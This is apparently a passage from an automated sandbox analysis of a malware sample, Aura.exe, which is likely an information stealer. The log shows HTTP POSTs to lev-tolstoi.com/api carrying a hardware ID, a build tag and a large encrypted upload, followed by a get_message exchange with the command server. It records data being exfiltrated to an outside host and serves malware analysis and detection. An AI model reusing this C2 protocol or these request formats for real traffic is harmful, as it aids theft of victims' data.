                                                                                                                                                                                                                                                  2024-12-27 22:47:42 UTC1258OUTData Raw: 2d 2d 59 33 45 45 48 32 36 57 5a 49 55 5a 51 36 4f 45 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 38 32 30 32 33 46 42 38 46 33 39 44 34 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 59 33 45 45 48 32 36 57 5a 49 55 5a 51 36 4f 45 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 33 45 45 48 32 36 57 5a 49 55 5a 51 36 4f 45 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f
                                                                                                                                                                                                                                                  Data Ascii: --Y3EEH26WZIUZQ6OEFKContent-Disposition: form-data; name="hwid"4D582023FB8F39D4C0B9CBDD268CC7CD--Y3EEH26WZIUZQ6OEFKContent-Disposition: form-data; name="pid"1--Y3EEH26WZIUZQ6OEFKContent-Disposition: form-data; name="lid"BVnUqo--@hito
                                                                                                                                                                                                                                                  2024-12-27 22:47:43 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=47q2ltji5r7mq3mu3upara7g8n; expires=Tue, 22 Apr 2025 16:34:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FyKnf85l9D4hesjRDvnrwPRsnNesPH%2F4MryVxEdbywmfAhtOdPkyiGfr2ilX4RCRfjjM1STaArJRbXRSWxYqury%2B4W3%2Fd9tDA07%2BL9knbLv3piUrCYJHuwfEUMZii9D%2FimY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cda9cdd520f43-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1505&rtt_var=565&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2174&delivery_rate=1933774&cwnd=32&unsent_bytes=0&cid=bbb54b9c763b34b7&ts=786&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:47:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449743104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=8Z6GI3CERO9K60
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 608294
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: 2d 2d 38 5a 36 47 49 33 43 45 52 4f 39 4b 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 38 32 30 32 33 46 42 38 46 33 39 44 34 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 38 5a 36 47 49 33 43 45 52 4f 39 4b 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 5a 36 47 49 33 43 45 52 4f 39 4b 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 38 5a 36
                                                                                                                                                                                                                                                  Data Ascii: --8Z6GI3CERO9K60Content-Disposition: form-data; name="hwid"4D582023FB8F39D4C0B9CBDD268CC7CD--8Z6GI3CERO9K60Content-Disposition: form-data; name="pid"1--8Z6GI3CERO9K60Content-Disposition: form-data; name="lid"BVnUqo--@hitok4111--8Z6
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: 52 a8 bc fa 32 3b c7 ec f3 02 f7 ce e7 23 88 52 bf 8a e3 e3 ce e0 14 77 b2 e0 30 f2 1e 7b dc 8a e0 65 42 64 d9 e1 03 d0 b8 7d 1e dc b1 0f fb 27 77 b5 da 0b f5 de 83 8e 29 72 ae 12 23 99 db 53 b9 21 ca b5 b4 8f 37 9a 52 c5 46 43 fc 22 b0 c9 d4 a3 d2 17 e8 32 6f 4b c2 fd 6d 6a de 30 0a 98 56 04 29 b1 b4 a4 8a 35 61 fc a0 29 9b f3 5f 4b 70 09 49 89 e1 9e 54 ef 11 11 77 95 7c 9f 1d e7 56 2b 72 10 c7 4c 42 b3 ef 91 f1 d9 a8 8a 9d ee f1 66 cf 7a a3 88 a7 36 c7 42 7d c2 7d a6 8a 30 43 1b 0e 4a 1c 97 e3 5d de a4 19 56 f7 17 57 70 0a fe 2c 3e 28 ef b5 25 b8 a6 26 d4 ea ed d4 44 f5 c0 b5 ef 9f fa 9a a5 e2 4c f3 5a 3a 9a ff 14 22 ba c9 1c da 45 9e 08 f7 8a ab 40 f7 18 88 a7 5c b4 0b 92 f9 44 33 ba da 87 1b 0e a9 be 29 10 42 12 5c 62 8c 15 7e 50 07 6f 8c 21 d2 47 8f
                                                                                                                                                                                                                                                  Data Ascii: R2;#Rw0{eBd}'w)r#S!7RFC"2oKmj0V)5a)_KpITw|V+rLBfz6B}}0CJ]VWp,>(%&DLZ:"E@\D3)B\b~Po!G
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: d7 ff 08 c3 19 37 89 47 5a 27 e3 c9 b1 05 8e 3c 08 ae 75 df dc b4 b8 76 76 85 e4 37 a4 88 34 dd e6 eb 9c 7d 79 f2 b0 ea d4 66 97 44 70 d2 3a a7 89 e3 11 91 b3 00 17 b2 bf b7 40 cc d5 06 84 7a c2 86 6e bf bf 21 e1 8d 8a 87 b1 63 f3 af 38 9c 6a ba 6a 1a 74 f6 16 86 ff 8c c4 0d 8f 5e d2 78 66 de cd a9 7d ef f9 eb 4d bd ac c6 a5 01 1e c2 2d 7e b8 aa 32 25 5b 24 48 aa 11 68 cf 72 8e e7 6b d0 bc d2 ca 98 10 1f 0e 91 a5 d5 ad 9b 34 e3 68 b8 58 5d ce 8e ae b7 02 f5 fa a7 70 aa ed 7c 77 9c d8 7e 5f 26 b8 c0 93 c2 7b 0d 10 2d 3f f0 73 92 52 52 64 4f 56 3a fd 59 03 f4 f1 b3 2a 5b e7 31 87 26 79 4a 2e 01 4c b3 23 99 35 f2 c2 83 55 7e e6 24 07 b0 16 63 e7 8b e4 ed 68 9f e1 bf 32 be 0e 0f 32 7a dd 8c c0 f2 c6 25 04 ad 2d a4 96 17 54 ed 3e f9 bf 72 c1 0d 12 f9 58 ec 28
                                                                                                                                                                                                                                                  Data Ascii: 7GZ'<uvv74}yfDp:@zn!c8jjt^xf}M-~2%[$Hhrk4hX]p|w~_&{-?sRRdOV:Y*[1&yJ.L#5U~$ch22z%-T>rX(
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: 54 9f 0b dd cd c9 0b ac 4b d8 a8 fe 04 b3 03 4e 3b b2 c3 68 66 8b bf f9 86 2f fd 07 fc d4 40 ed 64 7d 02 5f f7 f3 f6 75 4a 88 f9 c5 17 68 58 0d 91 69 ae 23 0f 1e b5 af f0 f5 57 aa 2b 2e 76 8a 00 f7 ab c2 b3 09 35 5a 48 1e 39 dc e7 77 e8 6d b5 b9 b3 9f 22 47 d2 b3 be 9f 2d 31 98 de 8d 7b bf eb 10 de 55 93 56 78 c6 c2 26 c2 d8 e6 ec ce f9 03 af fd 76 71 6f 1c 4e 29 f8 40 35 3d f9 00 8b d3 e8 47 a4 4f 08 e7 ff 56 79 7f 51 c3 0b a5 c3 fd 4e 60 e7 5d 79 4d fe fa 41 6d 7b 9b 4d e1 f3 0d d9 c1 88 fb 7b ae f2 3b 7f e1 d3 9b 37 7f 54 c2 ea 20 7a a0 a1 ad 64 bb 8c 28 87 89 73 99 ff 35 53 cb 01 04 20 f1 29 a5 3b 16 96 03 1e 0f d2 3c 1f b3 54 0e 14 3f d3 3b 38 18 5d ed 43 b8 7a fe f0 4b 4d ce 84 9a b0 3d c3 b1 a0 bb f8 64 83 52 7b b1 cb 32 90 60 91 3f 2a cd bd 46 ea
                                                                                                                                                                                                                                                  Data Ascii: TKN;hf/@d}_uJhXi#W+.v5ZH9wm"G-1{UVx&vqoN)@5=GOVyQN`]yMAm{M{;7T zd(s5S );<T?;8]CzKM=dR{2`?*F
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: e1 11 0d 14 fc f6 11 ec 20 88 48 34 39 d0 d7 52 d8 ce 15 d3 ae fb 2e e9 35 21 14 78 eb 39 1d 41 44 d4 4d df 4a de fb 31 46 f0 c7 2a 3c 2b 12 df 14 e9 7e db 42 10 8f 76 cf 90 4e 60 dc 5c f2 b6 e2 f7 af e6 15 bb 65 6c bf 3c a2 2e 18 1b a8 be 0a ca fe 26 cf 56 53 07 e9 86 ef 58 4b 2b a1 48 51 ac fb 62 8a 5e 02 4b 1a f5 4e 51 c1 13 86 8b af a7 e8 40 14 25 fe 87 12 50 1c 27 51 97 ce b5 fe 06 e5 d2 e8 0d 75 fe 67 48 66 a3 47 5a d0 f8 dc 58 75 01 c5 70 af 07 f0 b9 3e 8b 49 79 bf d5 87 ff 40 f8 61 a1 35 f4 76 01 a7 b4 3c 10 0b 8b b2 fc a9 26 5c ff 44 b6 40 ff 23 61 10 28 c8 71 51 84 c1 c6 09 29 d6 ef 13 ee f5 6e 5d 54 5f 5e 36 40 01 32 62 e8 be 85 19 82 96 a6 25 a8 67 f4 e2 b2 77 13 83 d9 90 80 21 36 c1 9d 23 39 da 34 2f 91 4b a8 34 4f 54 1c af e6 ac 96 6e f6 d3
                                                                                                                                                                                                                                                  Data Ascii: H49R.5!x9ADMJ1F*<+~BvN`\el<.&VSXK+HQb^KNQ@%P'QugHfGZXup>Iy@a5v<&\D@#a(qQ)n]T_^6@2b%gw!6#94/K4OTn
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: b1 45 e8 30 ab 0f 8a 2b 7b b3 07 6f e7 40 fe 72 1d 58 23 1b 7f 01 92 2a 02 fa 45 a4 79 00 ea a5 e1 36 9f 91 cf 2e 1b f5 2e 10 7c 41 04 ac e0 e8 49 15 48 62 59 cb 89 b0 a0 c6 af 28 a0 15 03 09 03 90 9d 22 ef cb f6 14 27 49 81 63 03 da 3c d0 6a 29 77 01 1c 45 10 a1 30 e9 e5 ef ba e3 ec b6 0d ae 3b a7 a7 e0 21 5b a1 86 4f 0e b9 8f 0a 1a 1a 79 59 45 4c b2 82 96 69 7d 4f 77 e1 b8 f2 8f 14 77 5d e1 5e 33 c5 c4 d8 c8 41 14 e2 99 ad f1 5f e0 bd a9 81 ed 3a 68 a6 b6 52 2f ca 57 f7 8b 50 fc 7e a2 48 f2 ed 8c 0b e3 f2 6f 84 6c e2 5f 33 2b 8a 0f c7 93 07 6f 13 da b9 f1 d2 0b 79 a3 80 7d 84 e7 14 63 78 3d fd e5 e6 ba 1a aa 27 a3 cd 41 07 8c 08 bd 5d 16 6e 8d 8d a1 86 07 56 d4 8e c5 97 18 0b 2e 0e a5 cb f3 ed d9 f5 ad 65 8d 84 f8 de 33 40 e0 5f ef 18 71 86 86 8b 6b 14
                                                                                                                                                                                                                                                  Data Ascii: E0+{o@rX#*Ey6..|AIHbY("'Ic<j)wE0;![OyYELi}Oww]^3A_:hR/WP~Hol_3+oy}cx='A]nV.e3@_qk
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: 62 c1 52 4a e9 96 0a eb 97 2e 8f e0 76 4f 95 25 db aa 64 04 d5 da 26 0f 41 4d fa 73 99 1f e8 5a e4 c9 01 6b d1 ed 19 bf fc ec ea d2 63 64 31 f0 99 85 a4 c7 11 2d ed 42 c2 e1 12 9d 3b 3c eb a2 db 87 e1 4f 84 6d 19 22 39 99 29 63 2f 79 18 0a c9 70 7c 33 22 fc ea 32 e7 02 df 16 40 2a 9b a9 9c fa 45 18 e8 5b 1f 53 88 79 11 be 5f 16 45 af c9 ae f4 1e 1a 7e d3 8a 3a b5 1f db 5a af 93 7b 22 60 8a 15 36 c9 72 1a 89 aa 0b 9f 5a 4f f7 10 9c 34 d3 e6 2a 90 28 c3 e2 b8 1e 3a d7 39 5c c3 c7 ee c1 7b 4c b5 4d 65 9c 21 8a 19 2b 36 6f 24 21 8c ea 60 a7 7c 87 72 8b 4c 6c 6b e4 5d 11 ec 04 1f 6a 9f 6c c9 5b 68 7d 2a 90 a8 07 a4 66 f6 74 b4 73 6d 53 56 df 06 b9 6b ce 59 11 4f db 25 47 86 c9 28 58 8b af 71 03 ae f0 d4 09 f3 01 7e fb 67 49 fd 77 40 a0 14 ea 8f 0a 31 c2 ff f8
                                                                                                                                                                                                                                                  Data Ascii: bRJ.vO%d&AMsZkcd1-B;<Om"9)c/yp|3"2@*E[Sy_E~:Z{"`6rZO4*(:9\{LMe!+6o$!`|rLlk]jl[h}*ftsmSVkYO%G(Xq~gIw@1
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: 44 bd 6f 97 24 ec 32 24 36 81 5e d2 27 37 37 ee 18 f8 f2 a3 d0 47 64 7c 38 40 fd 06 c8 31 03 1e ad 23 c3 78 40 3d 93 46 11 83 48 65 f8 bc f3 20 4a 9c d4 8f 4a ba c5 7b c6 84 80 7e b8 e5 86 99 47 81 f7 78 fc 58 85 1e bf 3a 1a b8 a3 12 fe 0d 29 ef b8 f2 af a3 45 78 c0 63 a0 4c 73 15 87 8a 40 9e 00 fd c3 49 cb fe 88 5f 6f 69 79 7b db 68 0f ee 8d 4c a2 de 6a c6 47 e0 41 68 67 f9 a5 dd 4a 55 e1 f7 f8 40 af e4 a9 06 33 3a 26 43 e1 2d a3 f8 bd a7 63 0e b4 59 25 d8 43 c3 8a 3a 2b 4c 20 7e af 66 34 13 fe 35 c6 13 15 95 2a 50 b0 f4 96 dc d7 89 20 c7 c1 a1 f6 06 f5 c1 fb 8f a7 7f 4f d5 97 04 4f f7 b4 ef 8a 1b 68 da 87 96 73 5b ef d4 72 e0 df fa d2 29 f1 ef 51 84 32 5e 25 40 0b 13 21 d2 d3 f6 3d 63 99 e5 76 20 2a 59 24 13 c6 4d 78 ec 5c 92 03 7e c0 5b 0b 71 0a fa 7d
                                                                                                                                                                                                                                                  Data Ascii: Do$2$6^'77Gd|8@1#x@=FHe JJ{~GxX:)ExcLs@I_oiy{hLjGAhgJU@3:&C-cY%C:+L ~f45*P OOhs[r)Q2^%@!=cv *Y$Mx\~[q}
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: 02 51 61 f0 cd 78 f0 fd 6b 8c 9f 36 da ef 9d c6 a4 7a 03 4d 7a eb bf 48 0d 8f 8d 97 20 2b 01 91 93 5f b2 9a d2 b9 8f c5 cb 01 92 a1 f1 0c f9 89 d6 47 2e 69 7e 2c c2 40 b8 e8 78 91 48 54 a1 cd 50 64 d4 1d ed dd 79 ef 1a 21 7d f3 40 42 b8 4c 9c 01 76 5b 84 e7 d6 b7 44 2c 97 4f 5e 4f fe 8c 8a 69 3a 77 ee 7a 44 ab 46 29 a3 ff 46 41 07 5b b9 ca 0e 04 c0 5e 8e e2 23 1e cf 9e a9 e2 b9 3f 12 14 ff 24 3b 84 9f 15 13 72 0a d7 dd 2d 4f 43 f9 4e 2f 29 88 34 69 f1 f0 fd 4d a3 bd 3f 91 24 02 54 9e f2 ea 96 03 3c a9 a3 51 8f 4d cd 4e 77 0c 0b ad 89 75 d3 20 a5 63 c2 1e 2a cc fb f5 94 db 0d 0e 8e a9 b7 b8 33 38 88 49 7e bf 37 1a 3c 0d 3d f3 f7 4b 60 0f 37 c8 0d d6 f7 a5 bf 8b 03 85 93 4b 65 7e ef 70 a0 b0 ee ee a8 1a f8 37 5c 04 80 f2 b2 0b ef 9b 8e e0 9f a7 3b 62 ce f9
                                                                                                                                                                                                                                                  Data Ascii: Qaxk6zMzH +_G.i~,@xHTPdy!}@BLv[D,O^Oi:wzDF)FA[^#?$;r-OCN/)4iM?$T<QMNwu c*38I~7<=K`7Ke~p7\;b
                                                                                                                                                                                                                                                  2024-12-27 22:47:45 UTC15331OUTData Raw: ed be 17 c2 07 08 70 7d d4 26 8b 85 2f f4 8b c1 b9 df 39 69 62 8f 28 2b da 48 76 ab 9e 89 41 83 96 19 09 e6 2e 70 4a 27 4b 2c 0a 3f e5 90 8a 79 79 84 84 dd d2 15 b6 e5 3d 04 84 a0 d5 1f 32 b9 9d bd 92 91 ae 36 fe db af b1 4c fc fa 6f 15 8e dd 4f 40 6a c9 7b 7b b0 2f 05 6b 38 87 95 ce 46 9e c0 10 4d 09 32 30 0a d6 de 7a 2b 40 aa dc fe b0 98 92 48 fa c0 e0 54 c2 48 5e fc 5c 99 0c 58 61 74 56 33 9d 4d cb 3f 09 ae 2b c1 ae 5a 82 f3 35 5a 4e 63 d2 eb 72 69 33 ac fe 52 ab c6 b0 d3 b5 57 6f 51 af 4c a4 5f 19 bc 1e 18 ed 77 ae e7 d5 70 86 cb ba b5 a3 50 54 00 76 d2 7e 7e e0 ba 03 be db df c5 fe e9 71 11 8e f2 23 ca 11 c6 6a 78 40 d0 48 29 6b 5f bf 57 9c 89 ff d1 f4 5b 67 37 9e 2d 9e 4b e0 f2 32 28 cc ff 8a 4e bd cc 35 a1 b5 59 01 f4 55 37 0b 7f cb 28 99 35 ee ec
                                                                                                                                                                                                                                                  Data Ascii: p}&/9ib(+HvA.pJ'K,?yy=26LoO@j{{/k8FM20z+@HTH^\XatV3M?+Z5ZNcri3RWoQL_wpPTv~~q#jx@H)k_W[g7-K2(N5YU7(5
                                                                                                                                                                                                                                                  2024-12-27 22:47:48 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=3t5nsi89lhe617apo42rk91218; expires=Tue, 22 Apr 2025 16:34:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nTQeE%2FVtaqcUdp9T2mE1CeOW1zHKtw3JpO%2B3ksocDthIo3Y3TPzN5KPyAxt7VquVtNExMwuj74bSY2bCVEpmntJC%2F1MlOUhNMEvw%2B%2BjyS2Tg%2FwKrZOA%2FS7mvPHmAnFGDDyU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cdaaca82f42c2-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1576&rtt_var=611&sent=372&recv=636&lost=0&retrans=0&sent_bytes=2835&recv_bytes=610946&delivery_rate=1760096&cwnd=240&unsent_bytes=0&cid=239fabe796d37949&ts=2867&x=0"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449747104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:49 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 87
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:49 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 26 6a 3d 26 68 77 69 64 3d 34 44 35 38 32 30 32 33 46 42 38 46 33 39 44 34 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44
                                                                                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@hitok4111&j=&hwid=4D582023FB8F39D4C0B9CBDD268CC7CD
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:50 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=5gtilnncr99m5uod8sur9oqube; expires=Tue, 22 Apr 2025 16:34:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=571iVBpMAXE0tF0HB8q7M02EatnLNvKg%2FQqNp2nb45IGpLXsk2nFtSf%2B%2BqmDcOI31qH2XPv8ug6Yo871%2Br1o%2FxaQphDwafyIIjXZsjyPsx4xEXBiRmSRt7hNBXT7TDbyNgY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cdac7bb857293-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=986&delivery_rate=1586956&cwnd=158&unsent_bytes=0&cid=4c590ea8b6ef1312&ts=759&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC242INData Raw: 62 66 63 0d 0a 53 66 71 69 6b 59 77 48 4d 6b 31 38 47 56 36 43 4b 58 73 32 6f 65 42 4c 43 66 65 39 4d 35 30 68 6b 50 58 41 43 56 6c 47 4b 36 34 53 67 59 44 33 2b 43 55 49 66 46 41 37 4f 36 41 54 53 68 71 44 68 47 6b 7a 31 64 45 47 37 46 44 31 67 6f 74 34 50 42 34 41 34 53 36 62 6d 38 58 6b 51 52 6b 52 55 33 51 73 36 55 30 5a 5a 66 66 52 65 54 76 48 69 57 72 45 54 2f 53 4d 74 30 73 7a 4d 32 43 5a 4b 49 33 73 32 37 74 47 42 44 31 4a 66 32 72 7a 61 77 6b 48 37 71 55 54 50 74 7a 63 52 73 38 51 35 4c 2b 59 55 54 73 6b 66 38 6b 68 6b 38 61 69 77 45 5a 31 41 6b 68 72 4c 75 64 49 43 6c 6a 53 6f 7a 70 6e 6d 2b 45 63 39 30 37 58 67 35 55 39 43 79 42 64 6d 7a 6a 50 36 73 61 38 61 31 59 70 43 47 30 52 78 57 34 78 42 63 4b 55 66
                                                                                                                                                                                                                                                  Data Ascii: bfcSfqikYwHMk18GV6CKXs2oeBLCfe9M50hkPXACVlGK64SgYD3+CUIfFA7O6ATShqDhGkz1dEG7FD1got4PB4A4S6bm8XkQRkRU3Qs6U0ZZffReTvHiWrET/SMt0szM2CZKI3s27tGBD1Jf2rzawkH7qUTPtzcRs8Q5L+YUTskf8khk8aiwEZ1AkhrLudICljSozpnm+Ec907Xg5U9CyBdmzjP6sa8a1YpCG0RxW4xBcKUf
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 31 44 41 31 45 62 77 65 4d 57 6b 70 46 67 51 49 30 6a 69 41 6f 7a 74 38 4c 68 68 59 52 56 4c 61 32 62 32 61 77 35 69 39 37 55 44 66 62 62 4e 65 4e 78 75 78 4d 79 78 54 68 77 49 47 74 30 42 6b 4e 66 69 36 32 4a 37 4f 52 74 55 47 2b 4d 65 46 45 48 35 73 41 70 4d 75 4d 51 46 72 47 6e 5a 76 35 46 50 4c 78 6f 45 7a 42 32 64 32 75 76 43 4e 48 34 5a 4f 31 4a 6d 38 46 67 72 54 39 61 49 50 45 71 47 30 31 2f 42 44 76 71 61 68 33 38 4d 64 48 6e 49 50 35 6a 58 36 4d 52 41 66 79 45 59 65 69 72 32 5a 6a 78 78 35 64 4d 6f 65 72 62 6b 42 50 52 55 2f 4d 47 78 65 44 77 78 59 4a 67 73 6f 6f 6e 65 36 32 59 4c 47 52 52 66 64 64 34 47 45 6b 54 4b 72 69 6c 61 6f 59 77 42 79 68 47 6b 72 2f 52 6e 50 54 39 63 37 43 4f 50 36 61 66 65 61 6b 4d 39 53 31 67 76 38 68 77 64 41 70 61 79
                                                                                                                                                                                                                                                  Data Ascii: 1DA1EbweMWkpFgQI0jiAozt8LhhYRVLa2b2aw5i97UDfbbNeNxuxMyxThwIGt0BkNfi62J7ORtUG+MeFEH5sApMuMQFrGnZv5FPLxoEzB2d2uvCNH4ZO1Jm8FgrT9aIPEqG01/BDvqah38MdHnIP5jX6MRAfyEYeir2Zjxx5dMoerbkBPRU/MGxeDwxYJgsoone62YLGRRfdd4GEkTKrilaoYwByhGkr/RnPT9c7COP6afeakM9S1gv8hwdApay
